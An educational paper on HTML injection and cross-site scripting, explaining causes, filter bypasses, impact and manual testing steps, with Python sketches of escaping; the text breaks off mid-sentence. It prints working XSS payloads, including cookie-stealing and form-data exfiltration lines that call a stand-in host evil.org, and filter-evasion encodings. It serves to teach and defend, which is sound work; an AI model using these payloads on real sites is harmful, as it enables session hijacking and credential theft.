XSS and HTML Code Injection

HTML Code Injection and Cross-site scripting
Understanding the cause and effect of CSS (XSS) Vulnerabilities

As web-based applications have become more sophisticated, the types of
vulnerabilities attackers are capable of exploiting have rapidly increased. A
particular class of attacks, commonly referred to as code insertion and often as
Cross-Site Scripting, has become increasingly popular. Unfortunately, the number
of applications vulnerable to these attacks is staggering, and the variety of
ways attackers are finding to exploit them is increasing. Analysis of many sites
has indicated that not only are the majority of sites vulnerable, but they are
vulnerable to many different methods and much of their content is affected.
Introduction
Web servers delivering dynamic content to Internet clients constitute an
integral component of most organisations' online service offerings. The ability
to tune content and respond to an individual client request represents standard
functionality for any successful site. Unfortunately, due to poorly developed
application code and data processing systems, the majority of these sites are
vulnerable to attacks that focus upon the way HTML content is generated and
interpreted by client browsers. Attackers are often able to embed malicious
HTML-based content within client web requests. With sufficient forethought and
analysis, attackers can exploit these flaws by embedding scripting elements
within the returned content without the knowledge of the site's visitor.
Although the potential dangers have been known for several years now, the recent
successes and improved understanding of cross-site scripting attacks have
increased the importance of correctly handling user input within dynamically
generated web content. High profile sites have already been shown to be
susceptible to cross-site scripting attacks. Future attacks are likely to become
more sophisticated and, through automation and exploitation of client browser
vulnerabilities, many times more devastating.
This document aims to educate those responsible for the management and
development of commercial online services by providing the information necessary
to understand the significance of the threat, and by offering advice on securing
applications against this type of attack.
Code Insertion
The success of this type of attack hinges upon the functionality of the client
browser. In HTML, some characters are treated specially in order to distinguish
displayable text from the interpreted markup language. One of the most common
special characters used to define elements within the markup language is the <
character, which typically indicates the beginning of an HTML tag. These tags
can either affect the formatting of the page or introduce a program that the
client browser executes (e.g. the <SCRIPT> tag introduces a JavaScript program).
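As a minimal sketch of why these special characters matter, the following Python
fragment writes the same user-supplied string into a page twice: once raw, and
once after its special characters have been converted to HTML entities with the
standard library's html.escape. Python is used purely for illustration, and the
function name render_comment is hypothetical rather than part of any
application discussed here.

```python
import html


def render_comment(text: str, escape: bool = True) -> str:
    """Return an HTML fragment containing user-supplied text (hypothetical helper)."""
    body = html.escape(text) if escape else text
    return "<p>" + body + "</p>"


user_input = "Hello World! <SCRIPT>alert('x')</SCRIPT>"

# Raw insertion: the browser receives a real <SCRIPT> element.
print(render_comment(user_input, escape=False))

# Escaped insertion: '<' and '>' arrive as &lt; and &gt;, so the text is
# displayed rather than interpreted as markup.
print(render_comment(user_input))
```

In the escaped form the < character no longer marks the beginning of a tag, so
the browser treats the whole string as displayable text.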
As most web browsers are able, by default, to interpret scripts embedded within
HTML content, an attacker who successfully injects script content is likely to
have it executed by the end user within the context of the delivery (e.g.
website, HTML help, etc.). Such scripts may be written in any number of scripting
languages, provided that the client host can interpret the code. Tags that are
most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET>
and <EMBED>.
While this document largely focuses upon the threat presented through the
injection of malicious scripting code, other tags may be inserted and abused by
an attacker. Consider the <FORM> tag: by inserting the appropriate HTML tag
information, an attacker could modify the behaviour of an existing form and so
trick visitors to the site into revealing sensitive information. Other HTML tags
may be inserted to alter the appearance and behaviour of a page (e.g. alteration
of an organisation's online annual accounts or president's statement).
It is important to understand the HTML tags that are most commonly used to carry
out code insertion attacks. The following table details the most important
attributes of these tags. However, it is important to note that alternative
in-line scripting elements, such as javascript:alert('executing script'), may
be used and interpreted by the current generation of web browsers.
HTML Tag Description
<SCRIPT> Adds a script that is to be used in the document.
Attributes:
* type = Specifies the language of the script. Its value must be a media typ
e (e.g. text/javascript). This attribute is required by the HTML 4.0 specificati
on and is a recommended replacement for the language attribute.
* language = Identifies the language of the script, such as JavaScript or VB
Script.
* src = Specifies the URL of an outside file containing the script to be loa
ded and run with the document. (Netscape only)
Supported by: Netscape, IE 3+, HTML 4, Opera 3+
<OBJECT> Places an object (such as an applet, media file, etc.) on a docu
ment. The tag often contains information for retrieving ActiveX controls that IE
uses to display the object.
Attributes:
* classid = Identifies the class identifier of the object.
* codebase = Identifies the URL of the object's codebase.
* codetype = Specifies the media type of the code. Examples of code types in
clude audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)
* data = Specifies the URL of the data used for the object.
* name = Specifies the name of the object to be referenced by scripts on the
page.
* standby = Specifies the message to display while the object loads.
* type = Specifies the media type for the data.
* usemap = Specifies the imagemap URL to use with the object.
Supported by: Netscape, IE, HTML 4
<APPLET> Used to place a Java applet on a document. It is deprecated in
the HTML 4.0 specification in favour of the <object> tag.
Attributes:
* code = Specifies the class name of the code to be executed (required).
* codebase = The URL from which the code is retrieved.
* name = Names the applet for reference elsewhere on the page.
Supported by: Netscape, IE 3+, HTML 4
<EMBED> Embeds an object into the document. Embedded objects are most often mult
imedia files that require special plug-ins to display. Specific media types and
their respective plug-ins may have additional proprietary attributes for control
ling the playback of the file. The closing tag is not always required, but is re
commended. The tag was dropped by the HTML 4.0 specification in favour of the <o
bject> tag.
Attributes:
* hidden = Hides the media file or player from view when set to yes.
* name = Specifies the name for the embedded object for later reference with
in a script.
* pluginspage = Specifies the URL for information on installing the appropri
ate plug-in.
* src = Provides the URL to the file or object to be placed on the document.
(Netscape 4+ and IE 4+ only)
* code = Specifies the class name of the Java code to be executed. (IE only)
* codebase = Specifies the base URL for the application. (IE only)
* pluginurl = Specifies a source for installing the appropriate plug-in for
the media file. (Netscape only)
* type = Specifies the MIME type of the plug-in needed to run the file. (Net
scape only)
Supported by: Netscape, IE 3+, Opera 3+
<FORM> Indicates the beginning and end of a form.
Attributes:
* action = Specifies the URL of the application that will process the form.
* enctype = Specifies how the values for the form controls are encoded when
they are submitted to the server.
* method = Specifies which HTTP method will be used to submit the form data.
* target = Specifies a target window for the results of the form submission
to be loaded ( _blank, _top, _parent, and _self).
Supported by: All
Malicious Code
An embedded code attack is heavily dependent upon the delivery mechanism. Thus
the delivery method often dictates the audience the script will potentially
affect.
It is interesting to note that such attacks have been around since before the
Internet and HTML. Back in the days of dial-up Bulletin Board Systems (BBS), the
problem was site visitors encoding their messages in coloured ASCII; later, the
use of vector drawing languages permitted users to redesign pages themselves.
Thus many sites hosting discussion groups with user interfaces learnt a long
time ago to rigorously control the content that could be submitted.
An early problem for web-based discussion groups was the over-use and unintended
misuse of standard HTML tags. For instance, early message boards merely took the
user-submitted text from a standard POST form and added it to the discussion
page without any further processing. Users often included text formatting tags
to bold, italicise or colour their text, giving their message greater visual
impact. Unfortunately, it was not uncommon for someone to forget to provide a
closing format tag, with the unintentional effect of altering every following
message on the page. Now consider the implications for everyone viewing the
message if a user embedded either of the following two code snippets in their
posting.
Hello World! <SCRIPT>malicious code</SCRIPT>
Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">
Unfortunately, attackers are finding ever more ingenious methods of encoding the
ir embedded attacks, and consequently many more sites are vulnerable.
Of particular importance is the abuse of trust. Consider a trusted site with a
poorly coded search engine. An attacker may be able to embed their malicious code
within a hyperlink to the site. When the client web browser follows the link, the
URL sent to trusted.org includes the malicious code. The site sends a page back
to the browser that includes the value of criteria, which consequently forces the
execution of code from the attacker's server. For example:
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</A>
In the attack above, one source is inserting code into pages sent by another sou
rce.
It should be noted that this attack:
* disguises the link as a link to http://trusted.org,
* can be easily included in an HTML email message,
* does not supply the malicious code inline; the code is downloaded from
http://evil.org. Thus the attacker retains control of the script and can update
or remove the exploit code at any time.
This class of vulnerability is popularly referred to as cross-site scripting (CS
S or sometimes XSS).
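The trusted.org search example can be sketched in a few lines of Python. This is
an illustration under stated assumptions, not the code of any real search.cgi:
the function search_page and its page layout are hypothetical, and only the
criteria parameter and the two host names come from the example above. The
sketch echoes the parameter into the returned page, first verbatim and then
after escaping with html.escape.

```python
import html
from urllib.parse import parse_qs, urlsplit


def search_page(url: str, escape: bool) -> str:
    """Build a results page that echoes the 'criteria' query parameter."""
    query = parse_qs(urlsplit(url).query)
    criteria = query.get("criteria", [""])[0]
    shown = html.escape(criteria) if escape else criteria
    return "<html><body>Results for: " + shown + "</body></html>"


link = ("http://trusted.org/search.cgi?criteria="
        "<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>")

# Vulnerable behaviour: the page served by trusted.org now loads a script
# from evil.org in the trusted site's context.
print(search_page(link, escape=False))

# Escaped behaviour: the same input is shown as text.
print(search_page(link, escape=True))
```

The first page contains a working <SCRIPT> element supplied by the attacker; in
the second, the same characters are delivered as &lt;SCRIPT ... &gt; and are
merely displayed.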
Cross Site Scripting
A cross-site scripting vulnerability is caused by the failure of a web-based
application to validate user-supplied input before returning it to the client
system. Cross-Site refers to the security restrictions that the client browser
usually places on data (i.e. cookies, dynamic content attributes, etc.)
associated with a web site. By causing the victim's browser to execute injected
code under the same permissions as the web application domain, an attacker can
bypass the traditional Document Object Model (DOM) security restrictions. This
can result not only in cookie theft but also in account hijacking, changing of
web application account settings, spreading of a webmail worm, etc.
Note that the access that an intruder has to the Document Object Model (DOM) is
dependent on the security architecture of the language chosen by the attacker. S
pecifically, Java applets do not provide the attacker with any access beyond the
DOM and are restricted to what is commonly referred to as a sandbox.
The most common web components that fall victim to CSS/XSS vulnerabilities
include CGI scripts, search engines, interactive bulletin boards, and custom error
pages with poorly written input validation routines. Additionally, a victim
doesn't necessarily have to click on a link; CSS code can also be made to load
automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME
HTML tags.
The most popular (and devastating) CSS/XSS attack is the harvesting of
authentication cookies and session management tokens. With this information, it
is often a trivial exercise for an attacker to hijack the victim's active
session, completely bypassing the authentication process. Unfortunately, the
mechanism of the attack is very simple and can be easily automated. A paper by
iDefence explains the process in great detail; it can be quickly summarised as
follows:
1. The attacker investigates an interesting site that normal users must
authenticate to gain access to, and that tracks the authenticated user through
the use of cookies or session IDs.
2. The attacker finds a CSS vulnerable page on the site, for instance
http://trusted.org/account.asp.
3. Using a little social engineering, the attacker creates a special link to
the site and embeds it in an HTML email that he sends to a long list of
potential victims.
4. Embedded within the special link are some coding elements specially designed
to transmit a copy of the victim's cookie back to the attacker. For instance:
<img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">
5. Unknown to the victim, the attacker has now received a copy of their cookie
information.
The attacker now visits the web site and, by substituting his cookie information
with that of the victim, is now perceived to be the victim by the server
application.
Note that Cross-site scripting is commonly referred to as CSS and/or XSS.
Understanding Code Insertion
To date, security professionals have discovered an ever increasing number of
methods for potentially embedding code within poorly configured web applications.
The following are some of the more common methods for doing so.
Inline Scripting
http://trusted.org/search.cgi?criteria=<script>code</script>
http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>
http://trusted.org/COM2.IMG%20src="Javascript:alert(document.domain)"
Forced Error Responses
http://trusted.org/<script>code</script>
This insertion facet usually occurs due to poor error handling by the web server
or application component. The application fails to find the requested page and
reports an error which unfortunately includes the unprocessed script data.
http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>
If a Java application such as a servlet fails to handle an error gracefully, and
allows stack traces to be sent to the user's browser, an attacker can construct
a URL that will throw an exception and add his malicious script to the end of the
request.
http://trusted.org/servlet/org.apache.catalina.servlets.WebdavStatus/<script>code</script>
In the example above, when the Tomcat servlet is called with the trailing
illegitimate request, an error page is served containing the offending text
verbatim.
Non <SCRIPT> Events
" [event]='code'
In many cases it may be possible for an attacker to insert an exploit string,
with the above syntax, into an HTML tag that was intended to look like:
<A HREF="exploit string">Go</A>
resulting in:
<A HREF="" [event]='code'">Go</A>
<b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>
As the client cursor moves over the bolded text, an intrinsic event occurs and t
he JavaScript code is executed.
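The attribute breakout described above can be reproduced with a short Python
sketch. The helper link_tag is hypothetical and the event handler body is a
harmless placeholder; the point is only to show how a leading double quote in
the supplied value closes the HREF attribute, and how encoding that quote (here
with html.escape and quote=True) keeps the value inside it.

```python
import html


def link_tag(href: str, escape: bool) -> str:
    """Place a user-supplied value inside the HREF attribute of an anchor."""
    value = html.escape(href, quote=True) if escape else href
    return '<A HREF="' + value + '">Go</A>'


# A string of the form:  " [event]='code'
exploit = "\" onMouseOver='alert(document.domain)'"

# Unescaped: the injected quote ends HREF and onMouseOver becomes an attribute.
print(link_tag(exploit, escape=False))

# Escaped: the quotes are encoded, so the whole string stays inside HREF.
print(link_tag(exploit, escape=True))
```

Note that encoding quotes only prevents the breakout; it does nothing about
values that are themselves scripts, such as the javascript: URLs mentioned
earlier.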
JavaScript Entities
<img src="&{alert('CSS Vulnerable')};">
The special character & is sometimes interpreted as a new JavaScript code segment
(entity).
Typical Payloads Formatting
<img src = "malicious.js">
<script>alert('hacked')</script>
<iframe src="malicious.js">
<script>document.write('<img src="http://evil.org/'+document.cookie+'">')</script>
<a href="javascript:">click-me</a>
Insertion Example
Dynamic URL Generation
Consider an application built to run on Microsoft's Internet Information Server
(IIS) web server platform. Dynamic content is delivered through IIS's Active
Server Pages (ASP).
Within the sample page, a dynamically built HTML tag for refining search paramet
ers is constructed as follows:
<A HREF="http://trusted.org/search_main.asp?searchstring=SomeString">click-me</A>
and the ASP code required to generate a further query based upon this submitted
information is:
<%
// BaseUrl is the fixed prefix; the SearchString value is appended unfiltered.
var BaseUrl = "http://trusted.org/search2.asp?searchagain=";
Response.Write("<a href=\"" + BaseUrl
    + Request.QueryString("SearchString") + "\">click-me</a>");
%>
If the attacker were to replace SomeString with their own code, as indicated
next:
<a href="http://trusted.org/search_main.asp?
SearchString=%22+onmouseover%3D%27ClientForm%
2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%
3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%
2Esubmit%3B%27">FooBar</a>
the likely result found in the dynamically generated ASP page will be:
<A HREF="http://trusted.org/search2.asp?
searchagain=" onmouseover='ClientForm.
action="evil.org/get.asp?Data=" +
ClientForm.PersonalData;ClientForm.
submit;'">click-me</A>
In this case, the attacker has added to the HTML page code, and used the DOM of
the HTML page to redirect data in some form to the attacker's web site.
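To make the mechanics of this example easier to follow, here is a hedged Python
re-creation of what the ASP page does with the query string. It is a sketch, not
the original ASP: build_link mimics the unfiltered concatenation, and
build_link_safe is a hypothetical alternative that percent-encodes the value
and HTML-escapes the attribute before writing it out.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

BASE_URL = "http://trusted.org/search2.asp?searchagain="


def _search_string(request_url: str) -> str:
    """Return the decoded SearchString parameter, as the server would see it."""
    params = parse_qs(urlsplit(request_url).query)
    return params.get("SearchString", [""])[0]


def build_link(request_url: str) -> str:
    """Mimic the ASP page: append the raw value to BASE_URL."""
    return '<a href="' + BASE_URL + _search_string(request_url) + '">click-me</a>'


def build_link_safe(request_url: str) -> str:
    """Hypothetical fix: re-encode the value, then escape the attribute."""
    target = BASE_URL + quote(_search_string(request_url), safe="")
    return '<a href="' + html.escape(target, quote=True) + '">click-me</a>'


attack_url = (
    "http://trusted.org/search_main.asp?SearchString="
    "%22+onmouseover%3D%27ClientForm%2Eaction%3D%22evil%2Eorg%2Fget%2Easp"
    "%3FData%3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%2Esubmit%3B%27"
)

print(build_link(attack_url))       # the onmouseover attribute escapes the HREF
print(build_link_safe(attack_url))  # the value stays inside the HREF
```

The server decodes %22 to a double quote before the page is built, which is why
the encoded request turns into live markup in the first output.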
Bypassing Anti-CSS Filters
A key function of any application filtering process will be the removal of
possibly dangerous special characters. However, in many circumstances it may be
difficult to filter a large range of these characters due to the application's
unique requirements.
Corporate application developers must carefully evaluate how their code will
perform with a variety of attack strings. In addition, they should fully
understand the different methods by which special characters can be encoded.
One of the most popular alternative character representations is URL escaped
encoding (percent-encoding), sometimes mistakenly referred to as Unicode
encoding. In this system, the hexadecimal value of the ASCII character is
prefixed with the % character.
Char   ;    /    ?    :    @    =    &    <    >    "    #
Code   %3b  %2f  %3f  %3a  %40  %3d  %26  %3c  %3e  %22  %23

Char   {    }    |    \    ^    ~    [    ]    `    %    '
Code   %7b  %7d  %7c  %5c  %5e  %7e  %5b  %5d  %60  %25  %27
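The codes in the table follow directly from each character's ASCII value, as the
short Python sketch below shows. The helper percent_encode is a hypothetical
name used for illustration; urllib.parse.unquote from the standard library
performs the reverse conversion.

```python
from urllib.parse import unquote


def percent_encode(ch: str) -> str:
    """Return the %XX escape for a single ASCII character."""
    return "%{:02x}".format(ord(ch))


specials = ";/?:@=&<>\"#{}|\\^~[]`%'"

# Print each character next to its escaped form, as in the table above.
for ch in specials:
    print(ch, percent_encode(ch))

# Decoding reverses the process.
print(unquote("%3cscript%3e"))
```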
To better understand the processes behind bypassing Anti-CSS filtering
mechanisms, a series of detailed examples is provided below.
Inserting Malicious Code
Simple Filtering of < and >
Many applications that implement some kind of content filtering will typically
filter out the < and > characters at the client-side. At first glance, this looks
like an effective way of ensuring <script> type HTML tags are not possible.
Unfortunately, not only is client-side code easy to bypass, but in many
circumstances the filter itself can be defeated using a mix of alternative
character representations and other special characters.
Consider a routine that removes the < and > special characters:
document.write(cleanSearchString('<>'));
The attacker now uses an alternative coding for the filtered characters, \x3c and
\x3e respectively, and begins their code with ') + to escape out of the routine.
') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'
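The weakness can be illustrated with a small Python simulation. Both functions
are assumptions made for the sake of the example: clean_search_string stands in
for a filter that deletes only literal < and > characters, and js_string_value
approximates how a JavaScript string literal later resolves hexadecimal escape
sequences. Neither is taken from a real application.

```python
import re


def clean_search_string(text: str) -> str:
    """Naive filter: delete literal '<' and '>' characters only."""
    return text.replace("<", "").replace(">", "")


def js_string_value(literal_body: str) -> str:
    """Approximate a JavaScript string literal resolving hex escapes."""
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)),
                  literal_body)


# The body of the attacker's string literal from the example above.
payload = r"\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e"

filtered = clean_search_string(payload)
print(filtered == payload)        # the filter finds nothing to remove
print(js_string_value(filtered))  # the browser still ends up with a script tag
```

The filter sees only backslashes, letters and digits, so it passes the payload
unchanged; the angle brackets reappear once the script engine evaluates the
string.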
Commenting out malicious code
Consider an application that filters content on behalf of its clients by causing
any scripting content to be safely commented out. For instance,
<script>code</script> is filtered by the application to become:
<COMMENT>

</COMMENT>
Unfortunately, it is a simple task to bypass the filter. This is accomplished by
including script code that will close the <comment> filter process. For example
, the attacker can send the following code:
<script>
- -->
</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open(http://evil.org/fakeloginscreen.jsp);">
</script>
After processing by the filter, the following code is embedded in the returned d
ocument:
<COMMENT>

</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open(http://evil.org/fakeloginscreen.jsp);">
</COMMENT>
This particular attack was originally designed to bypass the security filtering
processes of a large web-mail provider, and would have been embedded in HTML ema
il content. Users viewing the email would automatically be prompted with a fake
login screen, making for an easy method of harvesting user names and passwords.
Separate Window Handling
A popular method of handling potentially dangerous URL information is to force
the URL to be opened in a new browser window, by adding target=_blank to the HTML
<A> tag. This causes any malicious code to be executed in the context of a
different DOM.
Unfortunately, in many online email applications it is possible to bypass this
protection after analysing the harmless link supplied by the site.
Consider a site that parses a submitted link which, after processing, becomes:
<a href="javascript:" target="_blank">click-me</a>
causing the URL to be opened in a new window.
However, if the attacker constructs his HREF as follows,
<a href="javascript:..." foo="bar>click-me</a>
it will be interpreted as:
<a href="javascript:..." foo="bar target="_blank">click-me</a>
causing the code to be executed in the same page, under the same DOM.
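One way such a rewrite could go wrong is sketched below in Python. The function
force_new_window is a guess at the kind of processing involved (inserting the
attribute before the first > it finds), not the logic of any particular webmail
product; it is enough to reproduce both results shown above.

```python
def force_new_window(anchor_html: str) -> str:
    """Naive rewrite: add target="_blank" before the first '>' found."""
    return anchor_html.replace(">", ' target="_blank">', 1)


benign = '<a href="javascript:">click-me</a>'
crafted = '<a href="javascript:..." foo="bar>click-me</a>'

# The expected case: the link gains a real target attribute.
print(force_new_window(benign))

# The crafted case: the unterminated foo="bar value swallows the inserted
# text, so target="_blank" never becomes an attribute of its own.
print(force_new_window(crafted))
```

Because the rewrite works on text rather than on parsed attributes, the
attacker's unbalanced quote decides how the browser reads the inserted string.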
Escaped JavaScript Entities
In cases where almost all special characters are filtered from user-supplied
strings, attackers must encode the entire attack string.
Consider the following URL:
http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL%27%29%7d%3b&apropos=pos2
The %26%7balert%28%27EVIL%27%29%7d%3b resolves to &{alert('EVIL')}; causing, in
this instance, an unexpected JavaScript alert window to pop up with the text EVIL.
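The following Python sketch shows why the order of decoding and filtering
matters for a string like this. The character blacklist and both function names
are assumptions for illustration only; whether a given application inspects the
value before or after decoding depends on how it was written.

```python
from urllib.parse import unquote

# Hypothetical blacklist of characters a filter might reject.
FORBIDDEN = set("<>&{}()';")


def naive_filter_ok(raw_value: str) -> bool:
    """Inspect the value exactly as received, before any decoding."""
    return not (FORBIDDEN & set(raw_value))


def decoded_filter_ok(raw_value: str) -> bool:
    """Decode the percent-escapes first, then inspect the result."""
    return not (FORBIDDEN & set(unquote(raw_value)))


encoded = "%26%7balert%28%27EVIL%27%29%7d%3b"

print(unquote(encoded))            # the string the browser will eventually see
print(naive_filter_ok(encoded))    # passes: only %, digits and letters present
print(decoded_filter_ok(encoded))  # rejected once the escapes are resolved
```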
Web Integration
As client web browsers have evolved, they have incorporated an increasingly dive
rse range of functions. At the same time, many common desktop applications have
extended their functionality to replicate or incorporate the functionality of th
ese same browsers. While the security flaw may be HTML injection, and more speci
fically CSS, the avenues available for a malicious user or attacker to initiate
the attack are becoming ever broader. As is already evident, a popular personalis
ed delivery mechanism has now become HTML email. Unfortunately, the delivery meth
ods are becoming so diverse that no single security solution is available to preve
nt the attack. Consider the significance of the following delivery mechanisms.
The Flash! Attack
Flash! is a popular application for displaying animated visual information. It
has its own development language (ActionScript) for creating sophisticated
interactive menus, animated movies and games. The most popular web browsers often
install the interpreter for these files by default and, due to the large number
of sites that use the technology, many people will install the interpreter even
if it wasn't originally available with their web browser.
ActionScript has an internal function called getURL(). This function is used for
redirecting the client browser to another page. Normally the parameter supplied
to the function would be a URL. However, due to integration features between the
Flash! interpreter and the web browser, it is possible to insert scripting code
that would be successfully interpreted by the client web browser.
For instance, instead of:
getURL("http://www.technicalinfo.net")
It is possible to specify scripting code:
getURL("javascript:alert(document.cookie)")
Thus, it is possible to embed potentially dangerous scripting elements within a
common file format. The real significance of this threat is that it potentially
bypasses many corporate content inspection systems (particularly those that
filter out HTML <script> type tags) and local web browser security settings.
For an attack to be successful, the dangerous Flash! file (typically terminating
in a .swf extension) must be embedded within HTML data for viewing by remote clie
nts. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for inst
ance:
<EMBED
src="http://evil.org/badflash.swf"
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"
width="100"
height="100">
</EMBED>
The Impact
The impact of malicious code insertion is often difficult to quantify and will c
hange as new functionality or interactions are incorporated into both web server
s and client browsers. Already, users may unintentionally execute scripts writte
n by an attacker when they follow untrusted links in web pages, mail or instant
messages, or any other application capable of displaying HTML content (e.g. Micr
osoft Help). For this reason, a series of examples best illustrate the diversity
and impact of potential threats.
Consider the following examples:
* An attacker often has access to the document retrieved since the malicious
scripts are executed in a context that appears to have originated from the trus
ted site. With the appropriate insertions, a script could be used to read fields
in a form provided by the trusted server and send this data back to the attacke
r.
* An attacker may be able to embed script code that has additional interacti
ons with the legitimate web server without alerting the victim. For example, the
attacker could develop an exploit that posted data to a different page on the l
egitimate web server.
* An attacker may be able to poison the site's persistent cookies, thus
modifying the cookie content and causing malicious code to be executed each time
the user visits the trusted site. The malicious code is stored as a field
variable within the cookie, and executed each time the site dynamically generates
page content without the correct processing.
* An attacker may be able to cause a hidden window to start on the client
machine and use this to key-log all browser interaction of the victim. Should the
victim later visit sites requiring authentication, the attacker could harvest
this information.
* CSS type attacks can occur over SSL-encrypted connections. The victim,
accessing a trusted host over HTTPS, may still execute an attacker's code
unintentionally. If the attacker references document components on a remote host,
the victim's client browser may generate a warning message about the insecure
connection. However, the attacker can circumvent this warning by simply
referencing content on an SSL-capable web server.
* An attacker may construct the malicious code to reference internal resourc
es. Thus, an attacker may gain unauthorised access to an Intranet web server. On
ly one page on one web server in a domain is required to compromise the entire d
omain.
* An attacker may be able to bypass policies that prevent the victim browser
from executing scripts. For example, Internet Explorer security zones may prevent
the execution of scripts from untrusted Internet hosts. An attacker may embed t
heir code within the content of a trusted internal host.
* An attacker may use a social engineering aspect to the attack. Consider an
application that requires clients to complete a form to set up their account. A
n attacker may be able to insert malicious code into their application data. A q
uick phone call to the corporate help-desk asking for advice on their account ma
y cause the execution of the malicious code on the help-desk system.
* Even if the victim's web browser does not support scripting, an attacker may
still be able to alter the content of the page, affecting its appearance,
behaviour or normal operation.
To date the most popular application content to be targeted by attackers has bee
n web pages that:
* Return results based upon user input to search engines,
* Process credit card information,
* Store user-supplied content in databases and cookies for later retrieval.
Vulnerability Checking
Finding out if your application is vulnerable to a code insertion attack is ofte
n very simple. The key lies in the analysis of the dynamically generated client-
side HTML content. The following process has been frequently used in the past.
1. For each visible input field (these may be located in an HTML form, or rep
resented in the URL as variable=), try the most obvious scripting formats:
<script>alert('CSS Vulnerable')</script>
<img csstest=javascript:alert('CSS Vulnerable')>
&{alert('CSS Vulnerable')};
In any case, should an alert message pop up with the text CSS Vulnerable, the
application component is vulnerable - specifically the input field just checked.
2. If any of the above scripting checks causes the HTML page to display
incorrectly, the application component may still be vulnerable.
3. For each visible variable, submit/substitute the following string:
'';!--"<CSS_Check>=&{()} (Note that the string begins with two single-quot
es)
On the resultant page, search for the string <CSS_Check>. If you discover
<CSS_Check>, it is quite probable that the application component is vulnerable.
However, if the word CSS_Check is instead enclosed in an encoded form such as
&lt;CSS_Check&gt;, then it may not be vulnerable. If input is displayed literally
at ANY point in the document, it can be used to divert the flow of execution to
an attacker-supplied payload.
4. Having located the word CSS_Check, verify what (if any) other characters have
been altered or filtered from the original string '';!--"<CSS_Check>=&{()}.
Depending upon the filtered characters, the application component may still be
vulnerable.
5. Looking closely at the returned HTML code, identify the specific string an
attacker would need to break out of the current HTML tag or code sequence. If t
hese characters exist, unfiltered, in responses to the test string of part 3 (ab
ove) then there is a high probability that the application component is vulnerab
le.
6. Moving on from the obvious fields, repeat the process for all the hidden
fields not normally editable at the client end. The best method of doing this is
through the use of a free local host proxy server such as Achilles by DigiZen
Security group or WebProxy by @stake. These proxy servers allow HTTP requests to
be edited as they leave the client application, before being finally sent to the
server application.
7. In many cases, data will be submitted via the HTTP GET request. Throughout
the investigation, take note of potentially vulnerable application components t
hat require the HTTP POST command to submit data.
Turning a POST into a GET submission is a simple process. If the application
component fails to respond to the GET in the same way as it did to the POST
submission, it is probably not vulnerable to a URL based inline scripting attack.
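The manual inspection described in step 3 can be partly automated. The Python
sketch below is one possible approach rather than an established tool: the
function classify_reflection and its four result labels are hypothetical, and it
assumes the response body has already been fetched by other means. It reports
how the probe string came back in that body.

```python
import html

# The probe string from step 3 (it begins with two single quotes).
PROBE = "'';!--\"<CSS_Check>=&{()}"


def classify_reflection(body: str) -> str:
    """Report how the CSS_Check marker appears in a returned page."""
    if "<CSS_Check>" in body:
        return "literal"   # angle brackets survived: probably vulnerable
    if "&lt;CSS_Check&gt;" in body:
        return "encoded"   # brackets were converted to entities
    if "CSS_Check" in body:
        return "altered"   # reflected in some other form: inspect by hand
    return "absent"        # the input was not reflected at all


# Simulated responses standing in for real pages.
print(classify_reflection("<p>You searched for " + PROBE + "</p>"))
print(classify_reflection("<p>You searched for " + html.escape(PROBE) + "</p>"))
```

A result of "altered" still calls for the manual review in steps 4 and 5, since
the surrounding HTML determines which surviving characters matter.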
Putting It All Together
To bring together many of the ideas and processes discussed earlier in this
document, consider the following example. The anonymous site has a search engine
that responds to client data submissions. Normally the site would look like this:
Taking a closer look at the content source, we notice that our sample code appea
rs 21 times in the document, in various formats.
It appears 10 times in a format similar to:
<SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/
anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')
</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT>
9 times in a format similar to:
<a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript
%3E&pager.offset=10">2</a>
And twice in a format similar to:
document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\
"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>');
Obviously there are three different server-side processing routines for processi
ng client search data.
1. In the first type (ad.uk.doubleclick.net format), it appears that the proc
essing routine changes the case of characters and changes white space to the und
erscore (_).
2. The second type (href=) converts special characters into their escape-enco
ded formats, and white space into the + character.
3. The third type (document.writeln) places the complete string within a docu
ment.writeln JavaScript routine.
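The three behaviours can be approximated in Python to check that they account
for the observed output. These functions are inferred from the page source shown
above and are assumptions about what the server does, not its actual code; the
third is shortened to the part of the writeln call that matters.

```python
from urllib.parse import quote_plus


def ad_tag_format(term: str) -> str:
    """Type 1: lower-case the input and turn spaces into underscores."""
    return term.lower().replace(" ", "_")


def href_format(term: str) -> str:
    """Type 2: escape-encode special characters, spaces become '+'."""
    return quote_plus(term)


def writeln_format(term: str) -> str:
    """Type 3: drop the input, unchanged, into a document.writeln call."""
    return r"document.writeln('<INPUT NAME=\"q\" VALUE=\'" + term + r"\'>');"


sample = "<script>alert('CSS Vulnerable')</script>"

print(ad_tag_format(sample))
print(href_format(sample))
print(writeln_format(sample))
```

The first two outputs match the strings seen in the ad tag and the pager link,
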